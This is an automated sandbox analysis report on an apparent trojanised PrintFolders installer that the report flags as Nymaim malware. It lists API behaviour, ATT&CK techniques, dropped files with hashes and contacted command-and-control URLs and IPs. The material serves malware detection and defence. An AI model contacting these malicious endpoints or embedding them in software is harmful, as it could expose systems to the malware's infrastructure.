Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: GetLocaleInfoW,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: GetLocaleInfoW,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: GetLocaleInfoW,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Code function: 2_2_0040F7F3 cpuid

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp

Code function: 1_2_00455B2C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6D2D5CA0,SetNamedPipeHandleState,6D787180,CloseHandle,CloseHandle,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004026C4 GetSystemTime,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405CB0 GetVersionExA,

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp

Code function: 1_2_00453A24 GetUserNameA,

Stealing of Sensitive Information

Yara detected Nymaim

Source: Yara match	File source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ntFolders.exe.3330000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ntFolders.exe.3330000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.330488356.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.329404364.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.330580256.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	1 Access Token Manipulation	2 Masquerading	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	13 Process Injection	1 Disable or Modify Tools	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Native API	Logon Script (Windows)	Logon Script (Windows)	1 Access Token Manipulation	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	13 Process Injection	NTDS	11 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	11 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	23 Software Packing	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	26 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\PrintFolders\ntFolders.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\PrintFolders\Russian.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\PrintFolders\is-6TIMV.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_iscrypt.dll	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-O82Q5.tmp\_isetup\_shfoldr.dll	2%	ReversingLabs
C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\LUxJPTIXtIs.exe	50%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.ntFolders.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
1.2.is-188R9.tmp.400000.0.unpack	100%	Avira	HEUR/AGEN.1232832		Download File
0.0.file.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2		Download File
0.3.file.exe.1fa8000.6.unpack	100%	Avira	TR/Patched.Ren.Gen		Download File
0.2.file.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2		Download File
2.2.ntFolders.exe.10000000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen8		Download File

Domains

Source	Detection	Scanner	Label	Link
windowsupdatebg.s.llnwi.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.innosetup.com/	0%	URL Reputation	safe
http://www.remobjects.com/?ps	0%	URL Reputation	safe
http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte	0%	URL Reputation	safe
http://www.innosetup.com	0%	URL Reputation	safe
http://107.182.129.235/storage/ping.php	0%	URL Reputation	safe
http://171.22.30.106/library.php	100%	URL Reputation	malware
http://107.182.129.235/storage/extension.php	0%	URL Reputation	safe
http://www.remobjects.com/?psU	0%	URL Reputation	safe
http://www.remobjects.com/?psU	0%	URL Reputation	safe
http://www.innosetup.comDVarFileInfo$	0%	Avira URL Cloud	safe
http://171.22.30.106/library.phpY	100%	Avira URL Cloud	malware
http://45.139.10	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
windowsupdatebg.s.llnwi.net	178.79.242.0	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte	true	URL Reputation: safe	unknown
http://107.182.129.235/storage/ping.php	true	URL Reputation: safe	unknown
http://171.22.30.106/library.php	true	URL Reputation: malware	unknown
http://107.182.129.235/storage/extension.php	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.innosetup.com/	is-188R9.tmp, is-188R9.tmp, 00000001.00000002.331460678.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-NNEQH.tmp.1.dr, is-188R9.tmp.0.dr	false	URL Reputation: safe	unknown
http://www.remobjects.com/?ps	file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp, is-188R9.tmp, is-188R9.tmp, 00000001.00000002.331460678.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-NNEQH.tmp.1.dr, is-188R9.tmp.0.dr	false	URL Reputation: safe	unknown
http://45.139.10	ntFolders.exe, 00000002.00000002.330100213.0000000001724000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://171.22.30.106/library.phpY	ntFolders.exe, 00000002.00000002.330100213.0000000001724000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.innosetup.com	file.exe	false	URL Reputation: safe	unknown
http://www.innosetup.comDVarFileInfo$	file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp, is-188R9.tmp, 00000001.00000000.242952411.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-NNEQH.tmp.1.dr, is-188R9.tmp.0.dr	false	Avira URL Cloud: safe	low
http://www.remobjects.com/?psU	file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp, is-188R9.tmp, 00000001.00000002.331460678.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-NNEQH.tmp.1.dr, is-188R9.tmp.0.dr	false	URL Reputation: safe URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.139.105.171	unknown	Italy		33657	CMCSUS	true
45.139.105.1	unknown	Italy		33657	CMCSUS	true
85.31.46.167	unknown	Germany		43659	CLOUDCOMPUTINGDE	true
107.182.129.235	unknown	Reserved		11070	META-ASUS	true
171.22.30.106	unknown	Germany		33657	CMCSUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	764035
Start date and time:	2022-12-09 10:46:08 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 21s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@12/23@0/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 41.7% (good quality ratio 40.8%) Quality average: 85.4% Quality standard deviation: 22.9%
HCA Information:	Successful, ratio: 96% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 8.238.85.126, 8.241.126.121, 8.238.191.126, 8.248.131.254, 8.238.190.126, 93.184.221.240
Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:47:07	API Interceptor	1x Sleep call for process: LUxJPTIXtIs.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Program Files (x86)\PrintFolders\Guide.chm (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	118869
Entropy (8bit):	7.933172616287708
Encrypted:	false
SSDEEP:	1536:a8+b7UxVIBmVQVxSHmIKruCGFkw8dctBJcIFEvSrT3eoxNjT+YL/fe3iWP7:Z+b76wV3hCb86tBJc7SffxNjqO/qiWT
MD5:	204A5BF160646F9A55ED70AB6E1A07A6
SHA1:	5404AB219FA01C270ADC36303D447109503C4A4D
SHA-256:	CACDD2C8BFA4BAE33A16A10ED609F4841AC5C4C2FE481ED0FD8CB04BC8016BBD
SHA-512:	6AAFBAF8565BF57BF4CC9E8D5EEF947E32E0D1A962C0BB619A25C35C68B7AA24599C60CB1C1B108FC9F58A1F13FF80B66E1A4DA506BE2FFD2DD05331865DAA15
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	ITSF....`..................\|.{.......".....\|.{......."..`...............x.......T.......................U...............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR......./#ITBITS..../#STRINGS...>.../#SYSTEM..V.../#TOPICS....`./#URLSTR...Gw./#URLTBL....H./#WINDOWS.....D./$FIftiMain...g..8./$OBJINST...T.../author.htm...m.<./cmdline.htm...O.../ctxmenu.jpg...3..B./index.htm..'.y./interface.htm.. .^./logo.jpg...P..4./main.css...u.../PrintDir.hhc...).'./screenshot.jpg.....././shell.htm...~.Q.::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content..[...,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompressed/SpanInfo.b./::DataSpace/Storage/MSCompressed/Transform/List.<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/...i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable...P...........

C:\Program Files (x86)\PrintFolders\History.txt (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5403
Entropy (8bit):	4.918324842676727
Encrypted:	false
SSDEEP:	96:uUzxQ0Bz664UbxDcqEVFUz1BDzeRGH+QanjY3ZLBxdfC4INXM/gr53F8EPeHl9j4:uU1QyZ4e9cqEfUz1BD0GH+QGjYJBxdfY
MD5:	C8B211D81EB7D4F9EBB071A117444D51
SHA1:	43BF57BB0931EBED953FE17F937C1C7FF58A027C
SHA-256:	AFD6FEA6A792B722E45A6587F70334F30051798017F4A278508C7ED3FEEA80CC
SHA-512:	C7C558EB666B570A0B03D1E8941217673677A6AF1F7CE4C43BE77D1AA859AD8DF7B212CF778B03678DD451535C7A7B02FEB65F20B744A8E9C969DF633F79A2AB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	=====================.. History of Releases..=====================....Legend..------..[+] - added..[] - modified..[-] - bug fixed......Version 2.51b..-------------..[-] The output file path wasn't updated in certain circumstances..[-] Added the workaround for the modal message boxes bug in Wine....Version 2.51a..-------------..[+] Focus rectangle added for the "Go!" button..[+] Added program version to the setup info..[] A couple of interface optimizations..[-] "Check for updates" now should work under Wine....Version 2.51..------------..[+] The "Help" buttons now present in each dialog..[+] Russian user interface..[] Improved Wine compatibility..[-] One very elusive bug inherited from the early versions finally fixed..[-] Improved the "Check for updates" behavior..[-] Fixed several regressions and smaller bugs....Version 2.5..-----------..[+] Checking for updates on startup (registered users only)..[] Faster processing of large numbers of files..[*] Folders containing no files acc

C:\Program Files (x86)\PrintFolders\License.txt (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	RAGE Package Format (RPF),
Category:	dropped
Size (bytes):	3391
Entropy (8bit):	4.812121234949207
Encrypted:	false
SSDEEP:	96:FjjD9GrzqpptIaj6JGcnRH7aamJL4zUtWAbakj:FYrrawhbaVFtTuk
MD5:	A5E8094B0CBADE929AEE07F5DA5E9429
SHA1:	60BB56A380CD9126AC067AE39B262E28A22532CD
SHA-256:	F3AC2009C96EB3A42AFAEC7FA67D3A14E5E9E30819B543D572C9BEA790CFCAD1
SHA-512:	018D1963A0B45A731687C5811E6447911E9BC7285B25EE3BBAD95D4D9C23718EF4E9714714C8A68617EAE4F840FB3D76BC77B0C49A64346D9605CCF70592356C
Malicious:	false
Preview:	PRINTFOLDERS version 2.51b..Copyright (C) 2009-2012 Andrey Pivovarov. All rights reserved.....END USER LICENSE AGREEMENT....This license describes the conditions under which you may use version 2.51b of ..PrintFolders ("the program"). If you are unable or unwilling to accept these ..conditions in full, then, notwithstanding the conditions in the remainder of ..this license, you may not use the program at all.....The program is a full-functional software. The program never expires and may be ..used for any period of time. The program has no exclusive limitations and does ..not require registration, though you may register your copy of the program to ..support the authors and remove the nag screens.....You may copy and distribute verbatim copies of the program executable, in any ..medium, provided that you conspicuously and appropriately publish on each copy ..an appropriate copyright notice and disclaimer of warranty; keep intact all the ..notices that refer to this license and to the a

C:\Program Files (x86)\PrintFolders\Russian.dll (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	4.508743257769972
Encrypted:	false
SSDEEP:	192:kxsrC3rSQgvlS7pEeHPmIOBaVeFSiLW70ygWr:csvGmIOBa5f
MD5:	4FB606EDBDE8EFB6D34E6E1BC5F677F1
SHA1:	F8F094064D107384E619DED1139932AA38476272
SHA-256:	A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62
SHA-512:	5B34ECB87582FFC210CA4EED06C729979D7197191CF74EB3CDB59D0F629603C171D50B6D9351DEB7DD13F6FCBBD79F8A23ED0114BBD991520CA9BFA4EF10A44D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.............5...............5......Rich....................PE..L....SwO...........!.........P...............................................p............@.......................................... ..`M...........................................................................................................rdata..m...........................@..@.rsrc...`M... ...N..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\PrintFolders\is-10I42.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	RAGE Package Format (RPF),
Category:	dropped
Size (bytes):	3391
Entropy (8bit):	4.812121234949207
Encrypted:	false
SSDEEP:	96:FjjD9GrzqpptIaj6JGcnRH7aamJL4zUtWAbakj:FYrrawhbaVFtTuk
MD5:	A5E8094B0CBADE929AEE07F5DA5E9429
SHA1:	60BB56A380CD9126AC067AE39B262E28A22532CD
SHA-256:	F3AC2009C96EB3A42AFAEC7FA67D3A14E5E9E30819B543D572C9BEA790CFCAD1
SHA-512:	018D1963A0B45A731687C5811E6447911E9BC7285B25EE3BBAD95D4D9C23718EF4E9714714C8A68617EAE4F840FB3D76BC77B0C49A64346D9605CCF70592356C
Malicious:	false
Preview:	PRINTFOLDERS version 2.51b..Copyright (C) 2009-2012 Andrey Pivovarov. All rights reserved.....END USER LICENSE AGREEMENT....This license describes the conditions under which you may use version 2.51b of ..PrintFolders ("the program"). If you are unable or unwilling to accept these ..conditions in full, then, notwithstanding the conditions in the remainder of ..this license, you may not use the program at all.....The program is a full-functional software. The program never expires and may be ..used for any period of time. The program has no exclusive limitations and does ..not require registration, though you may register your copy of the program to ..support the authors and remove the nag screens.....You may copy and distribute verbatim copies of the program executable, in any ..medium, provided that you conspicuously and appropriately publish on each copy ..an appropriate copyright notice and disclaimer of warranty; keep intact all the ..notices that refer to this license and to the a

C:\Program Files (x86)\PrintFolders\is-4GA3L.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	118869
Entropy (8bit):	7.933172616287708
Encrypted:	false
SSDEEP:	1536:a8+b7UxVIBmVQVxSHmIKruCGFkw8dctBJcIFEvSrT3eoxNjT+YL/fe3iWP7:Z+b76wV3hCb86tBJc7SffxNjqO/qiWT
MD5:	204A5BF160646F9A55ED70AB6E1A07A6
SHA1:	5404AB219FA01C270ADC36303D447109503C4A4D
SHA-256:	CACDD2C8BFA4BAE33A16A10ED609F4841AC5C4C2FE481ED0FD8CB04BC8016BBD
SHA-512:	6AAFBAF8565BF57BF4CC9E8D5EEF947E32E0D1A962C0BB619A25C35C68B7AA24599C60CB1C1B108FC9F58A1F13FF80B66E1A4DA506BE2FFD2DD05331865DAA15
Malicious:	false
Preview:	ITSF....`..................\|.{.......".....\|.{......."..`...............x.......T.......................U...............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR......./#ITBITS..../#STRINGS...>.../#SYSTEM..V.../#TOPICS....`./#URLSTR...Gw./#URLTBL....H./#WINDOWS.....D./$FIftiMain...g..8./$OBJINST...T.../author.htm...m.<./cmdline.htm...O.../ctxmenu.jpg...3..B./index.htm..'.y./interface.htm.. .^./logo.jpg...P..4./main.css...u.../PrintDir.hhc...).'./screenshot.jpg.....././shell.htm...~.Q.::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content..[...,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompressed/SpanInfo.b./::DataSpace/Storage/MSCompressed/Transform/List.<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/...i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable...P...........

C:\Program Files (x86)\PrintFolders\is-6TIMV.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	4.508743257769972
Encrypted:	false
SSDEEP:	192:kxsrC3rSQgvlS7pEeHPmIOBaVeFSiLW70ygWr:csvGmIOBa5f
MD5:	4FB606EDBDE8EFB6D34E6E1BC5F677F1
SHA1:	F8F094064D107384E619DED1139932AA38476272
SHA-256:	A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62
SHA-512:	5B34ECB87582FFC210CA4EED06C729979D7197191CF74EB3CDB59D0F629603C171D50B6D9351DEB7DD13F6FCBBD79F8A23ED0114BBD991520CA9BFA4EF10A44D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.............5...............5......Rich....................PE..L....SwO...........!.........P...............................................p............@.......................................... ..`M...........................................................................................................rdata..m...........................@..@.rsrc...`M... ...N..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\PrintFolders\is-BNMLH.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5403
Entropy (8bit):	4.918324842676727
Encrypted:	false
SSDEEP:	96:uUzxQ0Bz664UbxDcqEVFUz1BDzeRGH+QanjY3ZLBxdfC4INXM/gr53F8EPeHl9j4:uU1QyZ4e9cqEfUz1BD0GH+QGjYJBxdfY
MD5:	C8B211D81EB7D4F9EBB071A117444D51
SHA1:	43BF57BB0931EBED953FE17F937C1C7FF58A027C
SHA-256:	AFD6FEA6A792B722E45A6587F70334F30051798017F4A278508C7ED3FEEA80CC
SHA-512:	C7C558EB666B570A0B03D1E8941217673677A6AF1F7CE4C43BE77D1AA859AD8DF7B212CF778B03678DD451535C7A7B02FEB65F20B744A8E9C969DF633F79A2AB
Malicious:	false
Preview:	=====================.. History of Releases..=====================....Legend..------..[+] - added..[] - modified..[-] - bug fixed......Version 2.51b..-------------..[-] The output file path wasn't updated in certain circumstances..[-] Added the workaround for the modal message boxes bug in Wine....Version 2.51a..-------------..[+] Focus rectangle added for the "Go!" button..[+] Added program version to the setup info..[] A couple of interface optimizations..[-] "Check for updates" now should work under Wine....Version 2.51..------------..[+] The "Help" buttons now present in each dialog..[+] Russian user interface..[] Improved Wine compatibility..[-] One very elusive bug inherited from the early versions finally fixed..[-] Improved the "Check for updates" behavior..[-] Fixed several regressions and smaller bugs....Version 2.5..-----------..[+] Checking for updates on startup (registered users only)..[] Faster processing of large numbers of files..[*] Folders containing no files acc

C:\Program Files (x86)\PrintFolders\is-JKI8Q.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	data
Category:	dropped
Size (bytes):	3403776
Entropy (8bit):	5.672339987165257
Encrypted:	false
SSDEEP:	98304:/fY3VQjKp3rHsVs4F5LrGfQd0C28E/8K+:isBXR
MD5:	998EE7C6DBC3A2B7C9B1C9639CECA33C
SHA1:	E53F5F744CC01E8EF5C05ADAA594C87AF9DF6A66
SHA-256:	5B66B3EB6FEBD3076D7A199B86489A847546BB21439ADD813FBC1F6E598DF7C5
SHA-512:	E1511AAF4F8D30275ABDAFDAFCA50AF74DC6231FAD6C359B02E121E4986898C3C6C74A823726F4AE49534BAAC2EF61088B857E3FC67F997711C72F0FB9DF7020
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..c..........B..........P....................@..................................~4..............................................`...............................................................................................................text..."........................... ..`.rdata...6.......@..................@..@.data...0....@.......@..............@....tls.........P.......P..............@....rsrc........`.......`..............@..@.aud104...(..P....(..P..............`...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\PrintFolders\is-NNEQH.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	714506
Entropy (8bit):	6.488639273564823
Encrypted:	false
SSDEEP:	12288:Ih5UooqWolrP837JzHvA6izJgnnyFNmayiAZrvo6xOZ:q5NoqWolrP837JzHvA6yknyWFxvVxOZ
MD5:	F82EF8A460249A7A71B8DA396C651027
SHA1:	1BA036C9860EB581550998DA24980CC63CD7E2C9
SHA-256:	B7B477D0DE6348FAEA68869B86782B2859AC302A0DFE5C91B94CE65CFAD31218
SHA-512:	F331C2149313896A37AD0F268EB83EFF75B1A65EE1372185F02558F49BB4E0DE2BF9565D93DEF6A0009D37A2CDC297CC14108629CDBE168FDDA202470BEBE31A
Malicious:	true
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................t.............@..............................................@..............................$%...........................@...............................0......................................................CODE................................ ..`DATA................................@...BSS.....x................................idata..$%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc.......@......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\PrintFolders\ntFolders.exe

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	3403776
Entropy (8bit):	5.672340721630265
Encrypted:	false
SSDEEP:	98304:UfY3VQjKp3rHsVs4F5LrGfQd0C28E/8K+:9sBXR
MD5:	E2D8395C6ADC664320DCF1CFC63336F4
SHA1:	83B874B930FC45127A38E576ED26FF49ADB8EEBB
SHA-256:	3C340CC08770DCB3706C5AAEC7ADBA45BCC60737050C3ED817473589EEB862BE
SHA-512:	A6E5AB555F5DB60E5D519B37AD231ABB3B3F6261929A2744D5D16F9D66F9EB8CBEBE91997B2DE660BD8757D408D30993CFA48F6742377EA9FFD0FD844624D986
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..c..........B..........P....................@..................................~4..............................................`...............................................................................................................text..."........................... ..`.rdata...6.......@..................@..@.data...0....@.......@..............@....tls.........P.......P..............@....rsrc........`.......`..............@..@.aud104...(..P....(..P..............`...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\PrintFolders\unins000.dat

Process:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
File Type:	InnoSetup Log PrintFolders {3C248D7A-78F2-476F-86FF-34610A9B2E85}, version 0x2a, 3804 bytes, 618321\user, "C:\Program Files (x86)\PrintFolders"
Category:	dropped
Size (bytes):	3804
Entropy (8bit):	4.499289945780387
